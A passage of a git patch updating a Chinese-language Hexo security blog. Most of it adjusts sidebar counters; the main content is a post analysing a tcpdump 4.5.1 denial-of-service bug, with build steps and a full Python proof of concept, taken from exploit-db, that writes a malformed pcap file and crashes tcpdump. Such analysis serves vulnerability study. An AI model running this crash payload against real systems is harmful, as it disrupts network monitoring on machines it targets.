From fe30e74637143309cd5c3aa434a7e36d0c2ca9be Mon Sep 17 00:00:00 2001
From: Cool-Y <1072916769@qq.com>
Date: Sat, 23 Mar 2019 12:40:50 +0800
Subject: [PATCH] Site updated: 2019-03-23 12:40:40

---
 2000/01/01/hello-world/index.html             |    4 +-
 .../BIBA访问控制模型实现(python)/index.html   |    4 +-
 2018/12/23/基于规则引擎发现IOT设备/index.html |    4 +-
 .../wifi半双工侧信道攻击学习笔记/index.html   |    4 +-
 2019/02/22/qq数据库的加密解密/index.html      |    4 +-
 2019/03/16/小米固件工具mkxqimage/index.html   |    4 +-
 2019/12/25/TCPDUMP拒绝服务攻击漏洞/index.html |   45 +-
 about/index.html                              |    4 +-
 archives/2000/01/index.html                   |    4 +-
 archives/2000/index.html                      |    4 +-
 archives/2018/11/index.html                   |    4 +-
 archives/2018/12/index.html                   |    4 +-
 archives/2018/index.html                      |    4 +-
 archives/2019/01/index.html                   |    4 +-
 archives/2019/02/index.html                   |    4 +-
 archives/2019/03/index.html                   |    4 +-
 archives/2019/12/index.html                   |    4 +-
 archives/2019/index.html                      |    4 +-
 archives/index.html                           |    4 +-
 categories/IOT/index.html                     |    4 +-
 categories/index.html                         |    8 +-
 categories/二进制漏洞/index.html              | 1107 +++++++++++++++++
 categories/加密解密/index.html                |    4 +-
 categories/理论学习/index.html                |    4 +-
 categories/顶会论文/index.html                |    4 +-
 index.html                                    |   26 +-
 search.xml                                    |  236 ++--
 sitemap.xml                                   |    2 +-
 tags/QQ/index.html                            |    4 +-
 tags/SSH/index.html                           |    4 +-
 tags/TCPDUMP/index.html                       | 1106 ++++++++++++++++
 tags/USENIX/index.html                        |    4 +-
 tags/index.html                               |    8 +-
 tags/python/index.html                        |    4 +-
 tags/wifi/index.html                          |    4 +-
 tags/侧信道攻击/index.html                    |    4 +-
 tags/密码/index.html                          |    4 +-
 tags/小米/index.html                          |    4 +-
 tags/拒绝服务攻击/index.html                  | 1106 ++++++++++++++++
 tags/数据库/index.html                        |    4 +-
 tags/数据挖掘/index.html                      |    4 +-
 tags/文件格式/index.html                      |    4 +-
 tags/模型实现/index.html                      |    4 +-
 tags/自然语言处理/index.html                  |    4 +-
 tags/访问控制/index.html                      |    4 +-
 45 files changed, 3536 insertions(+), 252 deletions(-)
 create mode 100644 categories/二进制漏洞/index.html
 create mode 100644 tags/TCPDUMP/index.html
 create mode 100644 tags/拒绝服务攻击/index.html

diff --git a/2000/01/01/hello-world/index.html b/2000/01/01/hello-world/index.html
index dd176d72..4c6cdbf4 100644
--- a/2000/01/01/hello-world/index.html
+++ b/2000/01/01/hello-world/index.html
@@ -559,7 +559,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -570,7 +570,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/2018/11/16/BIBA访问控制模型实现(python)/index.html b/2018/11/16/BIBA访问控制模型实现(python)/index.html
index 09e3b31d..bed7acb3 100644
--- a/2018/11/16/BIBA访问控制模型实现(python)/index.html
+++ b/2018/11/16/BIBA访问控制模型实现(python)/index.html
@@ -731,7 +731,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -742,7 +742,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/2018/12/23/基于规则引擎发现IOT设备/index.html b/2018/12/23/基于规则引擎发现IOT设备/index.html
index 09c8e62c..d9549d89 100644
--- a/2018/12/23/基于规则引擎发现IOT设备/index.html
+++ b/2018/12/23/基于规则引擎发现IOT设备/index.html
@@ -633,7 +633,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -644,7 +644,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html b/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html
index 9d2a6763..33636fc2 100644
--- a/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html
+++ b/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html
@@ -760,7 +760,7 @@ Server   -------wire----------|
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -771,7 +771,7 @@ Server   -------wire----------|
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/2019/02/22/qq数据库的加密解密/index.html b/2019/02/22/qq数据库的加密解密/index.html
index d32d8448..b52b7616 100644
--- a/2019/02/22/qq数据库的加密解密/index.html
+++ b/2019/02/22/qq数据库的加密解密/index.html
@@ -610,7 +610,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -621,7 +621,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/2019/03/16/小米固件工具mkxqimage/index.html b/2019/03/16/小米固件工具mkxqimage/index.html
index f0679f69..9ed384f2 100644
--- a/2019/03/16/小米固件工具mkxqimage/index.html
+++ b/2019/03/16/小米固件工具mkxqimage/index.html
@@ -617,7 +617,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -628,7 +628,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/2019/12/25/TCPDUMP拒绝服务攻击漏洞/index.html b/2019/12/25/TCPDUMP拒绝服务攻击漏洞/index.html
index 916668c2..cefe0759 100644
--- a/2019/12/25/TCPDUMP拒绝服务攻击漏洞/index.html
+++ b/2019/12/25/TCPDUMP拒绝服务攻击漏洞/index.html
@@ -68,7 +68,7 @@
 
 
 
-  <meta name="keywords" content="Hexo, NexT">
+  <meta name="keywords" content="TCPDUMP,拒绝服务攻击,">
 
 
 
@@ -80,13 +80,14 @@
 
 
 <meta name="description" content="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析一、Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中，tcpdump 需要使用libpcap这个捕捉数">
+<meta name="keywords" content="TCPDUMP,拒绝服务攻击">
 <meta property="og:type" content="article">
 <meta property="og:title" content="TCPDUMP拒绝服务攻击漏洞">
 <meta property="og:url" content="https://cool-y.github.io/2019/12/25/TCPDUMP拒绝服务攻击漏洞/index.html">
 <meta property="og:site_name" content="混元霹雳手">
 <meta property="og:description" content="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析一、Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中，tcpdump 需要使用libpcap这个捕捉数">
 <meta property="og:locale" content="zh-Hans">
-<meta property="og:updated_time" content="2019-03-23T04:35:48.091Z">
+<meta property="og:updated_time" content="2019-03-23T04:40:15.773Z">
 <meta name="twitter:card" content="summary">
 <meta name="twitter:title" content="TCPDUMP拒绝服务攻击漏洞">
 <meta name="twitter:description" content="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析一、Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中，tcpdump 需要使用libpcap这个捕捉数">
@@ -334,6 +335,28 @@
           </span>
 
           
+            <span class="post-category">
+            
+              <span class="post-meta-divider">|</span>
+            
+              <span class="post-meta-item-icon">
+                <i class="fa fa-folder-o"></i>
+              </span>
+              
+                <span class="post-meta-item-text">分类于</span>
+              
+              
+                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
+                  <a href="/categories/二进制漏洞/" itemprop="url" rel="index">
+                    <span itemprop="name">二进制漏洞</span>
+                  </a>
+                </span>
+
+                
+                
+              
+            </span>
+          
 
           
             
@@ -414,7 +437,11 @@
 <li>tcpdump能够分析网络行为，性能和应用产生或接收网络流量。它支持针对网络层、协议、主机、网络或端口的过滤，并提供and、or、not等逻辑语句来帮助你去掉无用的信息，从而使用户能够进一步找出问题的根源。</li>
 <li>也可以使用 tcpdump 的实现特定目的，例如在路由器和网关之间拦截并显示其他用户或计算机通信。通过 tcpdump 分析非加密的流量，如Telnet或HTTP的数据包，查看登录的用户名、密码、网址、正在浏览的网站内容，或任何其他信息。因此系统中存在网络分析工具主要不是对本机安全的威胁，而是对网络上的其他计算机的安全存在威胁。</li>
 </ol>
-<h2 id="二、分析环境"><a href="#二、分析环境" class="headerlink" title="二、分析环境"></a>二、分析环境</h2><p>Ubuntu 16.04.4 LTS i686<br>tcpdump 4.5.1<br>gdb with peda</p>
+<h2 id="二、分析环境"><a href="#二、分析环境" class="headerlink" title="二、分析环境"></a>二、分析环境</h2><ul>
+<li>Ubuntu 16.04.4 LTS i686</li>
+<li>tcpdump 4.5.1</li>
+<li>gdb with peda</li>
+</ul>
 <h2 id="三、漏洞复现"><a href="#三、漏洞复现" class="headerlink" title="三、漏洞复现"></a>三、漏洞复现</h2><p>这个漏洞触发的原因是，tcpdump在处理特殊的pcap包的时候，由于对数据包传输数据长度没有进行严格的控制，导致在连续读取数据包中内容超过一定长度后，会读取到无效的内存空间，从而导致拒绝服务的发生。对于这个漏洞，首先要对pcap包的结构进行一定的分析，才能够最后分析出漏洞的成因，下面对这个漏洞进行复现。</p>
 <h3 id="1-编译安装tcpdump"><a href="#1-编译安装tcpdump" class="headerlink" title="1.编译安装tcpdump"></a>1.编译安装tcpdump</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">1.	# apt-get install libpcap-dev</span><br><span class="line">2.	# dpkg -l libpcap-dev</span><br><span class="line">3.	# wget https://www.exploit-db.com/apps/973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz</span><br><span class="line">4.	# tar -zxvf 973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz</span><br><span class="line">5.	# cd tcpdump-4.5.1/</span><br><span class="line">6.	# ./configure</span><br><span class="line">7.	# make</span><br><span class="line">8.	# make install</span><br><span class="line">9.	# tcpdump –-version</span><br><span class="line">          tcpdump version 4.5.1</span><br><span class="line">          libpcap version 1.7.4</span><br></pre></td></tr></table></figure>
 <h3 id="2-生成payload（来自exploit-db-payload）"><a href="#2-生成payload（来自exploit-db-payload）" class="headerlink" title="2.生成payload（来自exploit-db payload）"></a>2.生成payload（来自exploit-db payload）</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"># Exploit Title: tcpdump 4.5.1 Access Violation Crash</span><br><span class="line"># Date: 31st May 2016</span><br><span class="line"># Exploit Author: David Silveiro</span><br><span class="line"># Vendor Homepage: http://www.tcpdump.org</span><br><span class="line"># Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz</span><br><span class="line"># Version: 4.5.1</span><br><span class="line"># Tested on: Ubuntu 14 LTS</span><br><span class="line">from subprocess import call</span><br><span class="line">from shlex import split</span><br><span class="line">from time import sleep</span><br><span class="line"></span><br><span class="line">def crash():</span><br><span class="line">    command = &apos;tcpdump -r crash&apos;</span><br><span class="line">    buffer     =   &apos;\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff&apos;</span><br><span class="line">    buffer     +=  &apos;\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00&apos;</span><br><span class="line">    buffer     +=  &apos;\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00&lt;\x9c7@\xff\x00&apos;</span><br><span class="line">    buffer     +=  &apos;\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a&apos;</span><br><span class="line">    buffer     +=  &quot;\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&amp;\x80\x18\&apos;&quot;</span><br><span class="line">    buffer     +=  &quot;xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n&apos;, &apos;\x00\x00\x00\x00&quot;</span><br><span class="line">    buffer     +=  &apos;\x00\x00\x00\x00\x01\x03\x03\x04&apos;</span><br><span class="line">    with open(&apos;crash&apos;, &apos;w+b&apos;) as file:</span><br><span class="line">        file.write(buffer)</span><br><span class="line">    try:</span><br><span class="line">        call(split(command))</span><br><span class="line">        print(&quot;Exploit successful!             &quot;)</span><br><span class="line">    except:</span><br><span class="line">        print(&quot;Error: Something has gone wrong!&quot;)</span><br><span class="line">def main():</span><br><span class="line">    print(&quot;Author:   David Silveiro                           &quot;)</span><br><span class="line">    print(&quot;   tcpdump version 4.5.1 Access Violation Crash    &quot;)</span><br><span class="line">    sleep(2)</span><br><span class="line">    crash()</span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
@@ -485,6 +512,14 @@
 
     <footer class="post-footer">
       
+        <div class="post-tags">
+          
+            <a href="/tags/TCPDUMP/" rel="tag"># TCPDUMP</a>
+          
+            <a href="/tags/拒绝服务攻击/" rel="tag"># 拒绝服务攻击</a>
+          
+        </div>
+      
 
       
       
@@ -599,7 +634,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -610,7 +645,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/about/index.html b/about/index.html
index 5f3130b6..96f02429 100644
--- a/about/index.html
+++ b/about/index.html
@@ -368,7 +368,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -379,7 +379,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/archives/2000/01/index.html b/archives/2000/01/index.html
index 77ae7537..c32ffc4c 100644
--- a/archives/2000/01/index.html
+++ b/archives/2000/01/index.html
@@ -398,7 +398,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -409,7 +409,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/archives/2000/index.html b/archives/2000/index.html
index afc6bf5d..2dd2fa55 100644
--- a/archives/2000/index.html
+++ b/archives/2000/index.html
@@ -398,7 +398,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -409,7 +409,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/archives/2018/11/index.html b/archives/2018/11/index.html
index 779c4131..d768a8f8 100644
--- a/archives/2018/11/index.html
+++ b/archives/2018/11/index.html
@@ -398,7 +398,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -409,7 +409,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/archives/2018/12/index.html b/archives/2018/12/index.html
index b04910b2..b2d2547c 100644
--- a/archives/2018/12/index.html
+++ b/archives/2018/12/index.html
@@ -398,7 +398,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -409,7 +409,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/archives/2018/index.html b/archives/2018/index.html
index 70ef76e1..94c96d08 100644
--- a/archives/2018/index.html
+++ b/archives/2018/index.html
@@ -433,7 +433,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -444,7 +444,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/archives/2019/01/index.html b/archives/2019/01/index.html
index 06c1ecf5..c84a7da4 100644
--- a/archives/2019/01/index.html
+++ b/archives/2019/01/index.html
@@ -398,7 +398,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -409,7 +409,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/archives/2019/02/index.html b/archives/2019/02/index.html
index eaf4c0bc..3ac76d5c 100644
--- a/archives/2019/02/index.html
+++ b/archives/2019/02/index.html
@@ -398,7 +398,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -409,7 +409,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/archives/2019/03/index.html b/archives/2019/03/index.html
index e3e9a8a2..ec2306b6 100644
--- a/archives/2019/03/index.html
+++ b/archives/2019/03/index.html
@@ -398,7 +398,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -409,7 +409,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/archives/2019/12/index.html b/archives/2019/12/index.html
index df98e4e4..4dc1f1c8 100644
--- a/archives/2019/12/index.html
+++ b/archives/2019/12/index.html
@@ -398,7 +398,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -409,7 +409,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/archives/2019/index.html b/archives/2019/index.html
index dfe7c38f..d5eda50b 100644
--- a/archives/2019/index.html
+++ b/archives/2019/index.html
@@ -503,7 +503,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -514,7 +514,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/archives/index.html b/archives/index.html
index f6b29f26..2d7a3267 100644
--- a/archives/index.html
+++ b/archives/index.html
@@ -618,7 +618,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -629,7 +629,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/categories/IOT/index.html b/categories/IOT/index.html
index d6d7652c..87b416c8 100644
--- a/categories/IOT/index.html
+++ b/categories/IOT/index.html
@@ -379,7 +379,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -390,7 +390,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/categories/index.html b/categories/index.html
index 5428ef9e..27677b93 100644
--- a/categories/index.html
+++ b/categories/index.html
@@ -298,10 +298,10 @@
         
           <div class="category-all-page">
             <div class="category-all-title">
-                目前共计 4 个分类
+                目前共计 5 个分类
             </div>
             <div class="category-all">
-              <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/IOT/">IOT</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/加密解密/">加密解密</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/理论学习/">理论学习</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/顶会论文/">顶会论文</a><span class="category-list-count">2</span></li></ul>
+              <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/IOT/">IOT</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/二进制漏洞/">二进制漏洞</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/加密解密/">加密解密</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/理论学习/">理论学习</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/顶会论文/">顶会论文</a><span class="category-list-count">2</span></li></ul>
             </div>
           </div>
         
@@ -370,7 +370,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -381,7 +381,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/categories/二进制漏洞/index.html b/categories/二进制漏洞/index.html
new file mode 100644
index 00000000..b291b17e
--- /dev/null
+++ b/categories/二进制漏洞/index.html
@@ -0,0 +1,1107 @@
+<!DOCTYPE html>
+
+
+
+  
+
+
+<html class="theme-next gemini use-motion" lang="zh-Hans">
+<head><meta name="generator" content="Hexo 3.8.0">
+  <meta charset="UTF-8">
+<meta http-equiv="X-UA-Compatible" content="IE=edge">
+<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
+<meta name="theme-color" content="#222">
+
+
+
+
+
+
+
+
+
+<meta http-equiv="Cache-Control" content="no-transform">
+<meta http-equiv="Cache-Control" content="no-siteapp">
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+  
+  
+  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">
+
+
+
+
+
+
+
+<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">
+
+<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">
+
+
+  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">
+
+
+  <link rel="icon" type="image/png" sizes="32x32" href="/images/hackerrank.png?v=5.1.4">
+
+
+  <link rel="icon" type="image/png" sizes="16x16" href="/images/hackerrank.png?v=5.1.4">
+
+
+  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">
+
+
+
+
+
+  <meta name="keywords" content="Hexo, NexT">
+
+
+
+
+
+
+
+
+
+
+<meta property="og:type" content="website">
+<meta property="og:title" content="混元霹雳手">
+<meta property="og:url" content="https://cool-y.github.io/categories/二进制漏洞/index.html">
+<meta property="og:site_name" content="混元霹雳手">
+<meta property="og:locale" content="zh-Hans">
+<meta name="twitter:card" content="summary">
+<meta name="twitter:title" content="混元霹雳手">
+
+
+
+<script type="text/javascript" id="hexo.configurations">
+  var NexT = window.NexT || {};
+  var CONFIG = {
+    root: '/',
+    scheme: 'Gemini',
+    version: '5.1.4',
+    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
+    fancybox: true,
+    tabs: true,
+    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
+    duoshuo: {
+      userId: '0',
+      author: '博主'
+    },
+    algolia: {
+      applicationID: '',
+      apiKey: '',
+      indexName: '',
+      hits: {"per_page":10},
+      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
+    }
+  };
+</script>
+
+
+
+  <link rel="canonical" href="https://cool-y.github.io/categories/二进制漏洞/">
+
+
+
+
+
+  <title>分类: 二进制漏洞 | 混元霹雳手</title>
+  
+
+
+
+
+
+
+
+
+</head>
+
+<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
+
+  
+  
+    
+  
+
+  <div class="container sidebar-position-left ">
+    <div class="headband"></div>
+
